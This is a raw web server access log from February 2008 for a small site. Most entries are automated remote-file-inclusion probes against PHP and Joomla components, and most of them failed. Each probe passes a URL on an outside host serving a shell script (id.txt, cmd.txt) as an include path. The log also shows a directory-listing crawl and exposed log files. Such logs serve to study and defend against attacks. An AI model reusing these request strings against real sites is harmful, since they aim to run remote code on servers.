88.109.7.133 - - [03/Feb/2008:19:05:47 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:19:06:28 -0800] "GET /logs/access_071210.log//akocomments.php?mosConfig_absolute_path=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
219.117.242.234 - - [03/Feb/2008:19:12:20 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:19:12:35 -0800] "GET /logs/access_071231.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:19:12:35 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:19:12:36 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.19.18.66 - - [03/Feb/2008:19:16:34 -0800] "GET //templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:18:06 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:18:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:18:06 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:18:06 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:18:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:18:06 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.6.26.155 - - [03/Feb/2008:19:20:37 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
74.6.23.146 - - [03/Feb/2008:19:20:37 -0800] "GET /logs/access_071022.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
74.6.20.233 - - [03/Feb/2008:19:22:45 -0800] "GET /logs/access_071231.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.19.18.66 - - [03/Feb/2008:19:24:47 -0800] "GET /logs/access.log//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.19.18.66 - - [03/Feb/2008:19:24:47 -0800] "GET /logs//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.19.18.66 - - [03/Feb/2008:19:24:50 -0800] "GET /logs/access_071231.log//templates/headline_temp.php?nst_inc=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:26:09 -0800] "GET /logs/access_080121.log/myevent.php?myevent_path=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:26:09 -0800] "GET /myevent.php?myevent_path=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:26:09 -0800] "GET /logs/myevent.php?myevent_path=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [03/Feb/2008:19:26:16 -0800] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [03/Feb/2008:19:26:16 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [03/Feb/2008:19:26:16 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [03/Feb/2008:19:26:22 -0800] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
199.216.35.5 - - [03/Feb/2008:19:26:51 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
199.216.35.5 - - [03/Feb/2008:19:26:52 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
80.190.144.117 - - [03/Feb/2008:19:28:43 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
80.190.144.117 - - [03/Feb/2008:19:28:43 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:29:45 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:29:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:29:45 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.205.186.244 - - [03/Feb/2008:19:32:01 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
193.205.186.244 - - [03/Feb/2008:19:32:01 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
70.85.98.2 - - [03/Feb/2008:19:32:01 -0800] "GET /logs/access_080107.log/myevent.php?myevent_path=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
200.116.128.221 - - [03/Feb/2008:19:32:57 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
200.116.128.221 - - [03/Feb/2008:19:33:00 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
219.117.242.234 - - [03/Feb/2008:19:35:59 -0800] "GET /logs/access_071126.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
219.117.242.234 - - [03/Feb/2008:19:35:59 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.195.44.107 - - [03/Feb/2008:19:39:33 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.195.44.101 - - [03/Feb/2008:19:39:49 -0800] "GET /logs/access_071217.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
70.87.139.98 - - [03/Feb/2008:19:41:09 -0800] "GET /logs/access.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.87.139.98 - - [03/Feb/2008:19:41:09 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.87.139.98 - - [03/Feb/2008:19:41:10 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
217.31.58.88 - - [03/Feb/2008:19:41:29 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://h1.ripway.com/credo/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
217.31.58.88 - - [03/Feb/2008:19:41:29 -0800] "GET /convert/mvcw.php?vwar_root=http://h1.ripway.com/credo/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
201.212.0.39 - - [03/Feb/2008:19:41:56 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
201.212.0.39 - - [03/Feb/2008:19:41:56 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
134.36.2.74 - - [03/Feb/2008:19:43:09 -0800] "GET /myevent.php?myevent_path=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
85.214.63.184 - - [03/Feb/2008:19:45:50 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ascnet.extra.hu/c9??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.63.184 - - [03/Feb/2008:19:45:50 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ascnet.extra.hu/c9??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.63.184 - - [03/Feb/2008:19:45:50 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ascnet.extra.hu/c9??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.232.200.122 - - [03/Feb/2008:19:47:13 -0800] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.232.200.122 - - [03/Feb/2008:19:47:13 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.232.200.122 - - [03/Feb/2008:19:47:13 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:19:47:21 -0800] "GET /logs/access_080107.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.77.184.236 - - [03/Feb/2008:19:50:45 -0800] "GET /!scanhttp://www.pixeloutlet.com/cart/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
134.36.2.74 - - [03/Feb/2008:19:53:33 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:19:55:25 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
210.1.31.63 - - [03/Feb/2008:19:55:32 -0800] "GET /myevent.php?myevent_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:52 -0800] "GET / HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:52 -0800] "GET /?S=http%3A%2F%2Fwww.ce-cioceoforum.com%2Ftalk%2Ft1%2Froda%2Filubov%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:52 -0800] "GET /?S=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:52 -0800] "GET /?S=http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fixu%2Fxotem%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:53 -0800] "GET /?D=http%3A%2F%2Fwww.vacacionalhouse.com%2Fen%2Fimg%2Fvohe%2Fseyon%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:53 -0800] "GET /?D=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:53 -0800] "GET /?D=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:53 -0800] "GET /?N=http%3A%2F%2Fwww.spoddyland.co.uk%2Fscans%2Fyouneedtoselectaplanettoclaimbeforegettinginhere%2Fscanlogs%2Fiwazex%2Fatepec%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:54 -0800] "GET /?N=http%3A%2F%2Fwww.vacacionalhouse.com%2Fen%2Fimg%2Fvohe%2Fseyon%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:54 -0800] "GET /?N=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:54 -0800] "GET /?M=http%3A%2F%2Fwww.service-exposants.com%2Fstore%2Fpunotag%2Fufacip%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:54 -0800] "GET /?M=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:54 -0800] "GET /?M=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:55 -0800] "GET /?S=A HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:55 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:55 -0800] "GET /?D=A HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:55 -0800] "GET /?N=D HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:56 -0800] "GET /sitebuilder/ HTTP/1.0" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:56 -0800] "GET /?M=A HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:56 -0800] "GET /logs/ HTTP/1.0" 200 3353 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:56 -0800] "GET /?N=A HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:57 -0800] "GET /?S=D HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:57 -0800] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:57 -0800] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:57 -0800] "GET /?D=D HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:58 -0800] "GET /sitebuilder/?S=A HTTP/1.0" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:58 -0800] "GET /sitebuilder/?M=A HTTP/1.0" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:55:58 -0800] "GET /?M=D HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:56:01 -0800] "GET /logs/access_071119.log HTTP/1.0" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:56:01 -0800] "GET /logs/?N=D HTTP/1.0" 200 3353 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:56:01 -0800] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:56:01 -0800] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:56:02 -0800] "GET /sitebuilder/?S=D HTTP/1.0" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:56:02 -0800] "GET /sitebuilder/?M=D HTTP/1.0" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
80.253.112.104 - - [03/Feb/2008:19:56:02 -0800] "GET /logs/?N=A HTTP/1.0" 200 3353 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
74.6.22.10 - - [03/Feb/2008:19:59:52 -0800] "GET /logs/access_071217.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
211.218.149.119 - - [03/Feb/2008:20:00:47 -0800] "GET //templates/headline_temp.php?nst_inc=http://xamuja.freehostia.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:20:01:54 -0800] "GET /logs/access_071231.log//old_reports.php?file=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:20:01:54 -0800] "GET //old_reports.php?file=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.109.7.133 - - [03/Feb/2008:20:01:55 -0800] "GET /logs//old_reports.php?file=http://merkanet.mine.nu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.77.184.236 - - [03/Feb/2008:20:03:27 -0800] "GET /logs/access_080121.log/!scanhttp://www.pixeloutlet.com/cart/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.77.184.236 - - [03/Feb/2008:20:03:27 -0800] "GET /logs/!scanhttp://www.pixeloutlet.com/cart/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.77.184.236 - - [03/Feb/2008:20:03:36 -0800] "GET /logs/access_071126.log/!scanhttp://www.pixeloutlet.com/cart/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.38.24.138 - - [03/Feb/2008:20:05:34 -0800] "GET /logs/access_071217.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [03/Feb/2008:20:05:34 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
